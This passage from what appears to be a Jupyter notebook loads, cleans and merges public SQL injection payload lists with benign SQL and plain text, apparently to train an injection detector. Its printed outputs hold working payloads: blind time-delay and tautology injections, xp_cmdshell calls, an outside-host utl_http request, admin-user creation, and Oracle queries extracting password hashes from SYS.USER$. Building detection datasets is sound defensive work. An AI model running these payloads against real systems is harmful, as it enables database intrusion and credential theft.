 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n',
 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n',
 "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n",
 "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n",
 "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n",
 '",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n',
 '",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n',
 '",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n',
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n',
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n',
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n',
 "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n",
 "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n",
 "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n",
 '"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n',
 '"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n',
 '"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n']

In [43]:
FuzzDB_payloads_sql_blind_MySQL_ORDER_BY= cleanData(sqliList)
FuzzDB_payloads_sql_blind_MySQL_ORDER_BY[0:20]

[', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*',
 ', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --',
 ', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23',
 "', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*",
 "', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --",
 "', ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23",
 '", ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*',
 '", ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --',
 '", ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23',
 ' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*',
 ' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --',
 ' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23',
 "' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*",
 "' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --",
 "' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23",
 '" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*',
 '" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --',
 '" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23']

3.6) payloads-sql-blind-MySQL-WHERE

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt

In [44]:
path='./dataset/collected payloads/FuzzDB/payloads-sql-blind-MySQL-WHERE.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [45]:
sqliList[0:20]

[' and 0=benchmark(3000000,MD5(1))%20/*\n',
 ' and 0=benchmark(3000000,MD5(1))%20--\n',
 ' and 0=benchmark(3000000,MD5(1))%20%23\n',
 "' and 0=benchmark(3000000,MD5(1))%20/*\n",
 "' and 0=benchmark(3000000,MD5(1))%20--\n",
 "' and 0=benchmark(3000000,MD5(1))%20%23\n",
 '" and 0=benchmark(3000000,MD5(1))%20/*\n',
 '" and 0=benchmark(3000000,MD5(1))%20--\n',
 '" and 0=benchmark(3000000,MD5(1))%20%23\n',
 ') and 0=benchmark(3000000,MD5(1))%20/*\n',
 ') and 0=benchmark(3000000,MD5(1))%20--\n',
 ') and 0=benchmark(3000000,MD5(1))%20%23\n',
 ')) and 0=benchmark(3000000,MD5(1))%20/*\n',
 ')) and 0=benchmark(3000000,MD5(1))%20--\n',
 ')) and 0=benchmark(3000000,MD5(1))%20%23\n',
 '))) and 0=benchmark(3000000,MD5(1))%20/*\n',
 '))) and 0=benchmark(3000000,MD5(1))%20--\n',
 '))) and 0=benchmark(3000000,MD5(1))%20%23\n',
 ')))) and 0=benchmark(3000000,MD5(1))%20/*\n',
 ')))) and 0=benchmark(3000000,MD5(1))%20--\n']

In [46]:
FuzzDB_payloads_sql_blind_MySQL_WHERE= cleanData(sqliList)
FuzzDB_payloads_sql_blind_MySQL_WHERE[0:20]

[' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 ' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --',
 ' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23',
 "' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*",
 "' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --",
 "' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23",
 '" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 '" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --',
 '" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23',
 ' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 ' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --',
 ' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23',
 '  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 '  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --',
 '  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23',
 '  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 '  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --',
 '  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23',
 '  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*',
 '  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --']

# 4) SuperCowPowers :

4.1) SQL_3

source: https://github.com/SuperCowPowers/data_hacking/blob/master/sql_injection/data/SQL_3.txt

In [48]:
path='./dataset/collected payloads/SuperCowPowers/SQL_3.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [49]:
sqliList[0:20]

[') AND 93=93\n',
 ') AND 9170=2793\n',
 "') AND 7364=5114\n",
 "') AND 93=93\n",
 "') AND 4731=891\n",
 "' AND 5874=2869\n",
 "' AND 93=93\n",
 "' AND 529=7832\n",
 '" AND 5183=1335\n',
 '" AND 93=93\n',
 '" AND 5984=4419\n',
 ') AND 8703=8428 AND (7243=7243\n',
 ') AND 93=93 AND (5302=5302\n',
 ') AND 8117=9417 AND (1286=1286\n',
 ')) AND 3196=7637 AND ((6424=6424\n',
 ')) AND 93=93 AND ((1849=1849\n',
 ')) AND 4113=33 AND ((6244=6244\n',
 '))) AND 7371=4214 AND (((6219=6219\n',
 '))) AND 93=93 AND (((2816=2816\n',
 '))) AND 9563=2025 AND (((4031=4031\n']

In [50]:
SuperPowers_SQL_3= cleanData(sqliList)
SuperPowers_SQL_3[0:20]

[' )  AND 93 = 93',
 ' )  AND 9170 = 2793',
 "' )  AND 7364 = 5114",
 "' )  AND 93 = 93",
 "' )  AND 4731 = 891",
 "' AND 5874 = 2869",
 "' AND 93 = 93",
 "' AND 529 = 7832",
 '" AND 5183 = 1335',
 '" AND 93 = 93',
 '" AND 5984 = 4419',
 ' )  AND 8703 = 8428 AND  ( 7243 = 7243',
 ' )  AND 93 = 93 AND  ( 5302 = 5302',
 ' )  AND 8117 = 9417 AND  ( 1286 = 1286',
 '  )  )   AND 3196 = 7637 AND   (  (  6424 = 6424',
 '  )  )   AND 93 = 93 AND   (  (  1849 = 1849',
 '  )  )   AND 4113 = 33 AND   (  (  6244 = 6244',
 '  )  )   )  AND 7371 = 4214 AND   (  (   ( 6219 = 6219',
 '  )  )   )  AND 93 = 93 AND   (  (   ( 2816 = 2816',
 '  )  )   )  AND 9563 = 2025 AND   (  (   ( 4031 = 4031']

4.2) legit Data

source: https://github.com/SuperCowPowers/data_hacking/blob/master/sql_injection/data/legit.txt

In [111]:
#read benign data
path='./dataset/collected payloads/SuperCowPowers'
file="legit.txt"
df = pd.read_csv(os.path.join(path, file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python',  encoding="utf8")

In [112]:
df.head()

                                              benign
0                     ALTER SYSTEM FLUSH SHARED_POOL
1  ALTER TABLE metadatacollectionschema.altidcoll...
2  ALTER TABLE metadatacollectionschema.andsactiv...
3  ALTER TABLE metadatacollectionschema.andsparty...
4  ALTER TABLE metadatacollectionschema.andsservi...

In [113]:
df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1003 entries, 0 to 1002
Data columns (total 1 columns):
 #   Column  Non-Null Count  Dtype
---  ------  --------------  -----
 0   benign  1003 non-null   object
dtypes: object(1)
memory usage: 8.0+ KB

In [114]:
legit_plain_text=df['benign'].values
legit_plain_text[:5]

array(['ALTER SYSTEM FLUSH SHARED_POOL',
       'ALTER TABLE metadatacollectionschema.altidcollection OWNER TO omerouser',
       'ALTER TABLE metadatacollectionschema.andsactivity OWNER TO omerouser',
       'ALTER TABLE metadatacollectionschema.andsparty OWNER TO omerouser',
       'ALTER TABLE metadatacollectionschema.andsservice OWNER TO omerouser'],
      dtype=object)

In [135]:
path='./dataset/collected payloads/SuperCowPowers/legit.txt'
legit_list=[]
file= open(path, "r", encoding="utf8") # open file with a mode=r (read only mode
for i in file:
    legit_list.append(i)

In [136]:
legit_list[0:20]

['ALTER SYSTEM FLUSH SHARED_POOL\n',
 'ALTER TABLE metadatacollectionschema.altidcollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.andsactivity OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.andsparty OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.andsservice OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.contributorcollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.custodiancollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.dataformatscollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.fundingcollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.guestusersgroup OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.metadatacollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.metadatamedia OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.microscopecollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.portalimportdetails OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.projectscollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.publishercollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.relatedurlscollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.subjectforcollection OWNER TO omerouser\n',
 'ALTER TABLE metadatacollectionschema.subjectseoccollection OWNER TO omerouser\n',
 'ALTER TABLE products ADD CONSTRAINT pk_products PRIMARY KEY (id) CREATE TABLE patches ( id int PRIMARY KEY, patch int, product int FOREIGN KEY REFERENCES products(id), release date )\n']

In [137]:
SuperPowers_legit= cleanData(legit_list)
SuperPowers_legit[0:20]

['ALTER SYSTEM FLUSH SHARED_POOL',
 'ALTER TABLE metadatacollectionschema.altidcollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.andsactivity OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.andsparty OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.andsservice OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.contributorcollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.custodiancollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.dataformatscollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.fundingcollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.guestusersgroup OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.metadatacollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.metadatamedia OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.microscopecollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.portalimportdetails OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.projectscollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.publishercollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.relatedurlscollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.subjectforcollection OWNER TO omerouser',
 'ALTER TABLE metadatacollectionschema.subjectseoccollection OWNER TO omerouser',
 'ALTER TABLE products ADD CONSTRAINT pk_products PRIMARY KEY  ( id )  CREATE TABLE patches  (  id int PRIMARY KEY, patch int, product int FOREIGN KEY REFERENCES products ( id ) , release date  ) ']

In [92]:
print(len(SuperPowers_legit))

1003

# 5) Scott-park (benign data)

source: https://github.com/Scott-Park/MachineLearning/blob/master/Sql-Injection/source/trainingdata/plain.txt

In [117]:
#read benign data
path='./dataset/collected payloads/Scott'
file="plain.txt"
df = pd.read_csv(os.path.join(path, file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python',  encoding="utf8")

In [118]:
df.head()

                                         benign
0                           Add plain text here
1                    Ne te quaesiveris extra.
2   Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [119]:
plain_text=df['benign'].values
plain_text[:5]

array(['Add plain text here', 'Ne te quaesiveris extra.',
       'Man is his own star; and the soul that can',
       'Render an honest and a perfect man,',
       'Commands all light, all influence, all fate;'], dtype=object)

In [120]:
# convert from list to string
data=''
for x in plain_text:
    data+=" " + x

In [121]:
# filtering data from foreign words

stop_words = set(stopwords.words('english')) 

def filtering_words(posts):

    filtered=''
    
    for x in posts.split(' '):
        if x not in stop_words:
            filtered+=' '+x
    
    return filtered

In [122]:
data=filtering_words(data)  # filtering data
data=data.split('.')              # split sentences

In [123]:
data[:5]

['  Add plain text Ne te quaesiveris extra',
 ' Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 ' Epilogue Beaumont Fletchers Honest Mans Fortune Cast bantling rocks, Suckle she-wolfs teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional']

In [124]:
# seperate words inside tags

for i in range(len(data)):
    data[i]=data[i].replace('<', ' <')
    data[i]=data[i].replace('>', '> ')
    data[i]=data[i].replace('=', ' = ')

In [125]:
data[:5]

['  Add plain text Ne te quaesiveris extra',
 ' Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 ' Epilogue Beaumont Fletchers Honest Mans Fortune Cast bantling rocks, Suckle she-wolfs teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional']

In [91]:
print("Benign records: %2i" %len(data))

Benign records: 3440

# Combination of all sqli datasets

In [166]:
all_sqli_sentences=foospidy_sqli+libinjection_sqli+camoufl4g3_sqli+Burp_sqli_error_based+Burp_sqli_time_based+Burp_sqli_union_select+Burp_sqli_escape_chars+FuzzDB_GenericBlind+FuzzDB_payloads_sql_blind_MSSQL_INSERT+FuzzDB_payloads_sql_blind_MSSQL_WHERE+FuzzDB_payloads_sql_blind_MySQL_INSERT+FuzzDB_payloads_sql_blind_MySQL_ORDER_BY+FuzzDB_payloads_sql_blind_MySQL_WHERE+SuperPowers_SQL_3

In [167]:
print(len(all_sqli_sentences))

14457

In [168]:
all_sqli_sentences

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--",
 'a',
 '1 or 1 = 1',
 "1' or '1' = '1",
 "1 and user_name (  )   =  'dbo'",
 '1',
 "1'1",
 '1 exec sp_  ( or exec xp_ ) ',
 '1 and 1 = 1',
 "1' and 1 =  ( select count ( * )  from tablenames ) ; --",
 '1',
 "1 and user_name (  )   =  'dbo'",
 "\\'; desc users; --",
 "1\\'1",
 "1' and non_existant_table  =  '1",
 "' or username is not NULL or username  =  '",
 "1 and ascii ( lower ( substring  (  (  select top 1 name from sysobjects where xtype = 'u' ) , 1, 1  )  )   )  > 116",
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --",
 '1 uni/**/on select all from where',
 ' or 1 = 1',
 "' or '1' = '1",
 "'||utl_http.request ( 'httP://192.168.1.1/' ) ||'",
 "' || myappadmin.adduser ( 'admin', 'newpass' )  || '",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT banner FROM v$version WHERE ROWNUM = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.DATABASE_NAME FROM DUAL  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT host_name FROM v$instance  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT global_name FROM global_name  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( USERNAME  )  )   FROM SYS.ALL_USERS  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( PASSWORD  )  )   FROM SYS.USER$  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( table_name  )  )   FROM sys.all_tables  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( column_name  )  )   FROM sys.all_tab_columns  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = SYS.LOGIN_USER  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
